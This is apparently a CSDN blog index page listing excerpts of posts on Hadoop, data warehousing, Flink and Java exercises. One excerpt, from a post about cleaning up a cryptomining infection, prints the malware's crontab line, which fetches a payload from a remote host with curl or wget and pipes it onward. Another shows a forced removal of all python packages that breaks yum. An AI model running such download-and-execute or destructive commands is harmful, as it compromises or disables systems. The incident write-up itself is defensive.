Moody丶-CSDN博客

原创数据仓库——数据采集与同步【系统埋点设计】

系统埋点设计1、数据分类在工厂环境中，我们将数据仓库获取的数据划分为业务数据和用户行为数据。1. 业务数据：业务流程中产生的交易、状态流转、用户等相关的数据，通常存储在 DB 中，包括 rdbms、nosql等，这部分数据是业务相关的，具体哪些数据需要保留一般由业务侧设计，不需要过度关注，按实际需要采集即可。2. 用户行为数据：用户在使用产品过程中，与 C 端产品 (面向个人消费者的产品...

2019-08-01 13:33:55 4213

原创 CM&CDH超详细完美成功安装学习记录(比Ambari好装多了-__-！)

1.1 CM简介1.1.1 CM简介Cloudera Manager是一个拥有集群自动化安装、中心化管理、集群监控、报警功能的一个工具，使得安装集群从几天的时间缩短在几个小时内，运维人员从数十人降低到几人以内，极大的提高集群管理的效率。1.1.2 CM架构1.2 环境准备1.2.1 虚拟机准备克隆三台虚拟机（hadoop102、hadoop103、hadoop104），配置好对应主...

2019-07-25 16:49:31 1479 1

原创大数据项目重温——电商数据仓库(四)数据采集模块（下）【完结】

9、数据采集模块(五).Kafka安装(1).Kafka集群启动停止脚本1）在/home/weiwei/bin目录下创建脚本kf.sh[weiwei@hadoop102 bin]$ vim kf.sh在脚本中填写如下内容#! /bin/bashcase $1 in"start"){ for i in hadoop102 hadoop103 hadoop104...

2019-07-24 20:37:37 947

原创大数据项目重温——电商数据仓库(三)数据采集模块（中）

9、数据采集模块(三).日志生成(1).日志启动1）代码参数说明// 参数一：控制发送每条的延时时间，默认是0 Long delay = args.length > 0 ?Long.parseLong(args[0]) : 0L;// 参数二：循环遍历次数 int loop_len = args.length > 1 ?Integer.parseInt(args[1])...

2019-07-24 19:46:25 1730 3

原创大数据项目重温——电商数据仓库(二)数据采集模块（上）

9、数据采集模块(一).Hadoop安装集群规划：服务器hadoop102 服务器hadoop103 服务器hadoop104 HDFS NameNodeDataNode DataNode DataNodeSecondaryNameNode ...

2019-07-24 18:20:41 655

原创大数据项目重温——电商数据仓库(一)数据生成模块

一、数据仓库1、数据仓库概念数据仓库(DataWarehouse)，可简写为DW或DWH，是为企业所有级别的决策制定过程，提供所有类型数据支持的战略集合。它出于分析性报告和决策支持目的而创建。为需要业务智能的企业，提供指导业务流程改进、控制成本、提高产品质量等服务。2、数据仓库的特点数据仓库的数据是面向主题的数据仓库的数据是集成的数据仓库的数据是不可更新的数据仓库的数据是随时...

2019-07-24 14:19:16 1416 1

原创 Centos7.3卸载自带python导致yum不可用【解决方案】

1、查看系统版本：cat /etc/redhat-releaseCentOS Linux release 7.3.1611 (Core) 2、删除python及yum相关组件：#强制删除相关程序及关联#xargs：允许对输出内容执行其他命令删除现有pythonrpm -qa |grep python|xargs rpm -ev --allmatches --nodepswhere...

2020-03-02 22:12:48 1231 2

原创复杂事件处理(CEP)

让Storm插上CEP的翅膀 -Siddhi调研和集成Storm和esper整合的例子。演示数据流处理引擎在日志实时处理中的应用将Esper与Storm集成的库。随着企业信息化的进一步深入，企业产生大量的实时数据（比如证券市场的交易数据，电力行业的探测数据），用关系型数据库处理这些大量的实时数据，已经力不从心了。更重要的是，企业需要从这些大量的实时数据里面，及时发现、挖掘一些有意义的数...

2019-11-25 15:32:39 2304

原创【解决】ECS测试集群遭遇挖矿程序攻击

[root@hadoop1 sbin]# crontab -l*/10 * * * * (curl -fsSL --retry 3 -m180 "http://dl.djangocc.com:8080/p?a=p&a2=cron"||wget -q --tries=3 -T180 -O- "http://dl.djangocc.com:8080/p?a=p&a2=cron")|s...

2019-09-09 10:29:24 422

原创无外网CentOS7.3服务器制作yum本地源

1.背景连接在互联网的服务器，直接通过 yum install安装各种包，非常方便。但这次项目是面向工业生产环境的，工业的服务器为了数据安全，往往不能连接外网，导致centos中的yum安装工具不能使用，使用rpm包安装软件要处理各种依赖，非常不方便。那么能不能在不联网的情况下使用yum安装软件呢？一种办法是——使用iso做本地yum源，可以解决大部份的包安装。2.具体步骤① 查看服务器版...

2019-08-30 17:23:27 1452 1

原创 nested exception is org.apache.ibatis.exceptions.PersistenceException: ### Error querying database.

问题来源：Springboot:JDBC连接Mysql报错信息：原因未设定serverTimezone解决方案：添加serverTimezone=UTC#DB Configuration:spring.datasource.driverClassName=com.mysql.jdbc.Driverspring.datasource.url=jdbc:mysql://...

2019-08-28 09:43:19 19541 1

原创 Flink项目实践【一】实时热门商品统计

第1章项目整体介绍1.1 电商的用户行为电商平台中的用户行为频繁且较复杂，系统上线运行一段时间后，可以收集到大量的用户行为数据，进而利用大数据技术进行深入挖掘和分析，得到感兴趣的商业指标并增强对风险的控制。电商用户行为数据多样，整体可以分为用户行为习惯数据和业务行为数据两大类。用户的行为习惯数据包括了用户的登录方式、上线的时间点及时长、点击和浏览页面、页面停留时间以及页面跳转等等，我们可以...

2019-08-18 12:42:27 7156 2

原创【LeetCode 22】括号匹配的一种思路【简单易懂】

import java.util.ArrayList;import java.util.List;import java.util.Scanner;/** * Created by Moody丶Yang * Date：2019/8/5 */public class solution36_kuohaopipei { /* Leetcode 22 题题目：给...

2019-08-06 00:26:34 194

原创 Flink深入学习与介绍【下】

六、Time与Window6.1 Time在Flink的流式处理中，会涉及到时间的不同概念，如下图所示：① Event Time：是事件创建的时间。它通常由事件中的时间戳描述，例如采集的日志数据中，每一条日志都会记录自己的生成时间，Flink通过时间戳分配器访问事件时间戳。② Ingestion Time：是数据进入Flink的时间。③ Processing Time：是每一个执行基于...

2019-08-05 12:01:50 367

翻译 Flink深入学习与介绍【中】

四、Flink运行架构4.1 任务提交流程Flink任务提交后，Client向HDFS上传Flink的Jar包和配置，之后向Yarn ResourceManager提交任务，ResourceManager分配Container资源并通知对应的NodeManager启动ApplicationMaster，ApplicationMaster启动后加载Flink的Jar包和配置构建环境，然后启动...

2019-08-05 10:39:17 1674 1

一、Flink概述1.1流处理技术的演变在开源世界里，Apache Storm项目是流处理的先锋。Storm最早由Nathan Marz和创业公司BackType的一个团队开发，后来才被Apache基金会接纳。Storm提供了低延迟的流处理，但是它为实时性付出了一些代价：很难实现高吞吐，并且其正确性没能达到通常所需的水平，换句话说，它并不能保证exactly-once，即便是它能够保证的正确性...

2019-08-05 00:06:55 492

转载【Java】设计模式——工厂模式

原文地址： http://blog.csdn.net/zxt0601/article/details/52798423一、工厂模式概述属于创建型设计模式，需要生成的对象叫做产品，生成对象的地方叫做工厂。二、使用场景在任何需要生成复杂对象的地方，都可以使用工厂方法模式。直接用new可以完成的不需要用工厂模式。三、简单（静态）工厂模式一个栗子：我喜欢吃面条，抽象一个面条基类，(接口...

2019-08-01 23:31:05 179

原创数据仓库分层理论

1、CIF 层次架构CIF 层次架构（信息工厂）通过分层将不同的建模方案引入到不同的层次中，CIF 将数据仓库分为四层，如下图所示：① ODS（Operational Data Store）：操作数据存储层，往往是业务数据库表格的一对一映射，将业务数据库中的表格在 ODS重新建立，数据完全一致。② DWD（Data Warehouse Detail）：数据明细层，在 DWD 进行数据的清...

2019-08-01 11:25:09 2434

原创数据仓库基本理论

1、关系模式范式1.1 范式理论概述关系型数据库设计时，遵照一定的规范要求，目的在于降低数据的冗余性和数据的一致性，目前业界范式有：第一范式(1NF)、第二范式(2NF)、第三范式(3NF)、巴斯-科德范式(BCNF)、第四范式(4NF)、第五范式(5NF)。范式的标准定义是：符合某一种级别的关系模式的集合，表示一个关系内部各属性之间的联系的合理化程度。通俗地讲，范式可以理解为一张数据表的...

2019-08-01 10:58:36 4928

原创数据仓库之HBase技术框架剖析

Hbase 核心架构1.Hbase 框架基础HBase 的数据在存放时会按照Rowkey 进行排序，所以HBase 中的数据都是按照Rowkey有序的。HBase 的 Region 采用先横向拆分再纵向拆分的方式。所谓先横向，再纵向，就是先按照行对数据进行划分，再按列对数据进行划分。按行分隔后，就得到了两个 Region，此时每一个 Region 就需要一个 server 对它进行...

2019-07-31 17:54:05 832

原创数据仓库之Hive技术框架选型

Hive 技术框架剖析1.1 数据存储① 行存储基于 Hadoop 系统行存储结构的优点在于快速数据加载和动态负载的高适应能力，但是行存储不支持快速查询，当查询仅仅针对多列表中的少数几列时，它不能跳过不必要的列读取。同时，由于行存储混合着不同数据值的列，行存储不容易获得一个极高的压缩比，即空间利用率不易大幅提高，尽管通过熵编码和利用列相关性能够获得一个较好的压缩比，但是复杂数据存储实现会导...

2019-07-31 16:41:31 592

原创【Java】设计模式——单例模式

1、模式三要素1、类的构造函数私有化2、本类内部创建对象（用本类内部public static静态方法返回该静态对象）3、创建静态变量指向该类。2、饿汉式和懒汉式的差异：1、创建对象的时机不同！饿汉模式：在类加载初始化的时候就主动创建实例。（立即加载）懒汉模式：等到真正使用的时候才去创建实例，不用时不去主动创建。（延时加载）2、应用场合不同如果...

2019-07-31 00:06:00 130

原创集群分发脚本

1、第一步以Root账户为例：cd /usr/local/bin创建各个脚本名称如:群起脚本touch startcluster.sh(注意：如果是用远程连接工具如notepad++,可能会报错-bash: ./bin/start.sh: /bin/bash^M: bad interpreter: No such file or directory解决方法：查看文件格式用vim...

2019-07-29 16:48:40 240

原创 Java快排【代码极短】【递归 +分治】

1、快速排序的原理选择一个关键值作为基准值，比基准值小的都在左边序列（仍是无序的），比基准值大的都在右边序列（也是无序的），基准值的选取：一般为第一个元素。第一次循环：先从后往前比较，用基准值和最后一个值比较，如果比基准值小的交换位置。如果没有就继续比较下一个，直到找到第一个比基准值小的值才交换。找到这个值之后，就从前往后开始比较，如果有比基准值大的，交换位置，没有就继续比较下一个，直到...

2019-07-27 18:27:17 272

原创 Kylin的学习与介绍

Kylin 简介1.1 Kylin定义Apache Kylin是一个开源的分布式分析引擎，提供Hadoop/Spark之上的SQL查询接口及多维分析（OLAP）能力以支持超大规模数据，最初由eBay Inc开发并贡献至开源社区。它能在亚秒内查询巨大的Hive表。1.2 Kylin特点Kylin的主要特点包括支持SQL接口、支持超大规模数据集、亚秒级响应、可伸缩性、高吞吐率、BI工具集成...

2019-07-26 12:54:40 148

原创 Presto的学习与介绍

一、Presto简介1.1 Presto概念Presto是一个开源的分布式SQL查询引擎，适用于交互式分析查询，数据量支持GB到PB字节。Presto的设计和编写完全是为了解决像Facebook这样规模的商业数据仓库的交互式分析和处理速度的问题。注意：虽然Presto可以解析SQL，但它不是一个标准的数据库。不是MySQL、Oracle的代替品，也不能用来处理在线事务（OLTP）。1....

2019-07-26 12:25:35 2255

原创 error: failed to push some refs to 'https://github.com/XXX' 【把更新后的项目重新传到github上踩的小坑】

写在前面：叨扰一下更新自己的项目到GitHub常用的命令git statusgit add . git commit -m "本次更新的简单说明"git push origin master # 将本地主分支推到远程主分支更新项目中的登录界面同步到GitHub报错：error: failed to push some refs tohttps://github.com/Y...

2019-07-25 20:45:41 205

原创【Java】剑指Offer面试题四:在一个二维数组中（每个一维数组的长度相同），每一行都按照从左到右递增的顺序排序，每一列都按照从上到下递增的顺序排序。请完成一个函数，输入这样的一个二维数组和一个整数

题目描述在一个二维数组中（每个一维数组的长度相同），每一行都按照从左到右递增的顺序排序，每一列都按照从上到下递增的顺序排序。请完成一个函数，输入这样的一个二维数组和一个整数，判断数组中是否含有该整数。要求：时间复杂度 O(n)，空间复杂度 O(1)。解题思路该二维数组中的一个数，大于它的数一定在其右边，小于它的数一定在其上边。因此，从左下角开始查找，就可以根据 target 和当前元...

2019-07-23 22:46:37 365

原创【Java】剑指Offer面试题三:在一个长度为n的数组里的所有数字都在0到n-1的范围内。数组中某些数字是重复的，但不知道有几个数字是重复的。也不知道每个数字重复几次。请找出数组中任意一个重复的数

题目描述在一个长度为n的数组里的所有数字都在0到n-1的范围内。数组中某些数字是重复的，但不知道有几个数字是重复的。也不知道每个数字重复几次。请找出数组中任意一个重复的数字。例如，如果输入长度为7的数组{2,3,1,0,2,5,3}，那么对应的输出是第一个重复的数字2。要求：时间复杂度 O(N)，空间复杂度 O(1)。解题思路(源自CyC大牛)对于这种数组元素在 [0, n-1] ...

2019-07-23 22:10:19 3997 7

原创线程的死锁与避免死锁策略

一、两种程序运调度方式1、分时调度所有线程轮流使用 CPU 的使用权，平均分配每个线程占用 CPU 的时间。2、抢占式调度优先让优先级高的线程使用 CPU，如果线程的优先级相同，那么会随机选择一个(线程随机性)，Java使用的为抢占式调度。注：多线程程序并不能提高程序的运行速度，但能够提高程序运行效率，使得CPU的利用率更高。为了保证多线程安全，我们通常会采用加同步锁的方式:同步...

2019-07-23 18:19:37 274

原创本地计算机上的mysql服务启动后停止，某些服务在未由其他服务或程序使用时将自动停止。

问题：在win10服务下手动启动Mysql57(自定义的mysql服务名)报错：本地计算机上的mysql服务启动后停止，某些服务在未由其他服务或程序使用时将自动停止。我的解决方案:1、以管理员身份打开cmd窗口，用cd命令进入安装mysql时的bin目录：cd C:\Program Files\MySQL\MySQL Server 5.7\bin(我的安装路径是C:\Program Fil...

2019-07-10 23:20:27 7511 4

转载 Hadoop集群配置ssh免密码登入

原文链接：https://www.cnblogs.com/ivan0626/p/4144277.html一、准备工作用客户端工具（ssh client或者putty）连接到linux服务器。在root用户下输入命令vi /etc/hosts,用vi编辑hosts文件，如下：#127.0.0.1 localhost localhost.localdomain localhost4 l...

2019-07-08 11:50:48 1089

原创记录在阿里云下使用Ambari搭建部署Hadoop集群

步骤有点冗余，用的是CentOS7效果图粗略步骤及参考链接和遇到的问题：1.阿里云服务器三台CentOS 7 64位Server：172.19.209.*Slave：172.19.240.* 172.19.96.*网络：NAT模式2.设置FQDN在各个节点上操作：vi /etc/hosts172.19.209.* hadoop1.com hadoop1172.19.24...

2019-06-30 10:24:16 1396 5

原创阿里云DataV结合LayUI的一次实战

DataV+LayUI 实现大数据展示加粗样式加油！

2019-06-27 12:19:41 914

原创【Java题解】小米算法面试题

小米算法面试题对于无序数组a，求a[i]-a[j]的最大值，其中i<j.解决方法时间复杂度O(n)1. 首先我们通过一个指针k，从数组nums的第二位至倒数第二位分割此数组。2. 然后对每次分割开的两个数组，前半段求最小值kMin，后半段求最大值kMax。3. 最大差值kMax-kMin就是在保证i<j下的最大差值maxDiff。代码import java.util.A...

2019-06-07 10:52:13 1909 2

原创 Java 第八届蓝桥杯国赛小数第n位

问题描述：我们知道，整数做除法时，有时得到有限小数，有时得到无限循环小数。如果我们把有限小数的末尾加上无限多个0，它们就有了统一的形式。本题的任务是：在上面的约定下，求整数除法小数点后的第n位开始的3位数。输入：一行三个整数：a b n，用空格分开。a是被除数，b是除数，n是所求的小数后位置（0<a,b,n<1000000000）输出：一行3位数字，表示：a除以b，小数后...

2019-03-11 17:48:16 416

Moody的博客